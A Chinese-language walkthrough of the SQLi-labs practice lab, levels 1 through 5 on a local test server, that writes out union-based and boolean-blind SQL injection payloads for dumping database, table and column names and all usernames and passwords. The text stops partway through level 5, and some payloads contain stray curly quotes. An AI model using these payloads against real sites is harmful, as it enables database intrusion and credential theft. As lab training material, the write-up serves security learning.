记SQLI-LABS注入前20关

Sqli-labs项目地址—Github

使用HackBar插件

less-01:

Sqli-labs前20关均为数字型注入

Sqli-labs前四关较为类似以less-01为模板

将网址导入HackBar中：

1.根据提示，输入http://127.0.0.1/sqli/Less-1/?id=1'查看注入：

正常报错，输入--+进行注释：

2.输入http://127.0.0.1/sqli/Less-1/?id=1' order by 1--+查找：

出现用户名和密码。

继续输入 order by 2--+,order by 3--+,当输入 order by 4--+时：

出现报错，说明数据库只有三列

3.输入http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,2,3--+

来判断三列数据的回显点，用1，2，3来标记：

4.输入http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,2,database()--+在3回显点处输出当前数据库名：

5.输入http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,2,table_name from information_schema.tables where table_schema='security' limit 1,1--+查看位于security库下的第一个表：

通过limit x,1可以一个一个查看表名，也可使用函数将数据一起输出：

6.输入http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+查看库中所有的表：

7.输入http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,2,column_name from information_schema.columns where table_name='users' limit 0,1--+查看user表中的第一个列：

同上运用函数可输出所有的列：

8.输入http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,2,concat_ws('~',username,password) from security.users limit 1,1--+查看一个账号和密码以“~”隔开

结合函数可得到所有账号和密码：

less-02:

同第一关输入http://127.0.0.1/sqli-labs-master/Less-2/?id=1'

出现不同于第一关的报错，根据于第一关对比的报错提示可将注入改为：

http://127.0.0.1/sqli-labs-master/Less-2/?id=1 --+

可通过与第一关相同的方法查看信息：

提示：将特殊字符或名字改为16进制是一种好习惯：

原始	十六进制
'security'	0x7365637572697479
'users'	0x7573657273
'~'	0x7e

<span style="background-color:#f8f8f8"><span style="color:#333333">1.http://127.0.0.1/sqli/Less-2/?id=1'      查看是否有注入
2.http://127.0.0.1/sqli/Less-2/?id=1 order by 3--+   查看有多少列
3.http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,2,3--+ 查看哪些数据可以回显
4.http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,2,group_concat(schema_name) from information_schema.schemata --+ 查看所有数据库
5.http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479 --+查看所有的表
6.http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 --+查看所有的列信息
7.http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,2,group_concat(concat_ws(0x7e,username,password)) from security.users --+查看所有的账号和密码，并且使用~符号进行分割</span></span>

less-03:

同第一关输入http://127.0.0.1/sqli-labs-master/Less-3/?id=1'

根据提示输入改为：

http://127.0.0.1/sqli-labs-master/Less-3/?id=1') --+

可通过与第一关相同的方法查看信息：

<span style="background-color:#f8f8f8"><span style="color:#333333">1. http://127.0.0.1/sqli/Less-3/?id=1'   查看是否有注入
2. http://127.0.0.1/sqli/Less-3/?id=1') order by 3--+ 查看有多少列
3. http://127.0.0.1/sqli/Less-1/?id=1') union select 1,2,3--+ 查看哪些数据可以回显
3. http://127.0.0.1/sqli/Less-3/?id=-1') union select 1,2, group_concat(schema_name) from information_schema.schemata --+ 查看所有数据库
6. http://127.0.0.1/sqli/Less-3/?id=-1') union select 1,2, group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479 --+查看所有的表
7. http://127.0.0.1/sqli/Less-3/?id=-1') union select 1,2, group_concat(column_name) from information_schema.columns where table_name=0x7573657273 --+查看所有的列信息
8. http://127.0.0.1/sqli/Less-3/?id=-1') union select 1,2, group_concat(concat_ws(0x7e,username,password)) from security.users --+直接可以得到所有的账号和密码，并且使用~符号进行分割。</span></span>

less-04:

同前面输入http://127.0.0.1/sqli-labs-master/Less-4/?id=1‘

继续测试，输入：http://127.0.0.1/sqli-labs-master/Less-4/?id=1"

根据提示输入改为：

http://127.0.0.1/sqli-labs-master/Less-4/?id=1“)--+

接下来可通过与第一关相同的方法查看信息：

<span style="background-color:#f8f8f8"><span style="color:#333333">1. http://127.0.0.1/sqli/Less-4/?id=1"查看是否有注入
2. http://127.0.0.1/sqli/Less-4/?id=1”) order by 3--+ 查看有多少列
3. http://127.0.0.1/sqli/Less-4/?id=-1“) union select 1,2, group_concat(schema_name) from information_schema.schemata --+查看所有数据库
6. http://127.0.0.1/sqli/Less-4/?id=-1”) union select 1,2, group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479 --+查看所有的表
7. http://127.0.0.1/sqli/Less-4/?id=-1“) union select 1,2, group_concat(column_name) from information_schema.columns where table_name=0x7573657273 --+查看所有的列信息
8. http://127.0.0.1/sqli/Less-4/?id=-1”) union select 1,2, group_concat(concat_ws(0x7e,username,password)) from security.users --+直接可以得到所有的账号和密码，并且使用~符号进行分割。</span></span>

总结前四关可看出sqli-labs常见注入形式有：

1
'1'
"1"
('1')
("1")

less-05:

同第一关输入http://127.0.0.1/sqli-labs-master/Less-5/?id=1'

提示：想显示图中多出的语句可在源码$sql处中加入如图代码：

根据提示可输入：http://127.0.0.1/sqli-labs-master/Less-5/?id=1‘--+

通过不同测试可以知道less-05只返回对错无回显点：

补充函数：

此关属于bool盲注，需要一个一个试，有两种方法：

(1)使用burpsuite进行抓包爆破：

输入http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and left((select database()),1)='s'--+：

burpsuite抓包，以“s“作为报破点：

设置有效载荷选项，线程数设为30：

爆破后通过不同的返回长度可知道正确字符：

将1变为2，其他不变同样流程进行爆破。

接下来同上关顺序改变语句依次进行查表查列等操作。

(2).使用ascii().substr()函数利用二分法猜测字母：

输入http://127.0.0.1/sqli-labs-master/Less-5/?id=1 ' and ascii(substr((select schema_name from information_schema.schemata limit 1,1),1,1)) >100--+

1.即判断当前库的第一个字母的ASCII码是否大于100：

结果无返回值，可知当前库的第一个字母的ASCII码并不大于100。

2.利用二分法，改变数值，即输入http://127.0.0.1/sqli-labs-master/Less-5/?id=1 ' and ascii(substr((select schema_name from information_schema.schemata limit 1,1),1,1)) >50--+

出现回显，说明当前库的第一个字母的ASCII码大于50。

3.同理继续输入http://127.0.0.1/sqli-labs-master/Less-5/?id=1 ' and ascii(substr((select schema_name from information_schema.schemata limit 1,1),1,1)) >75--+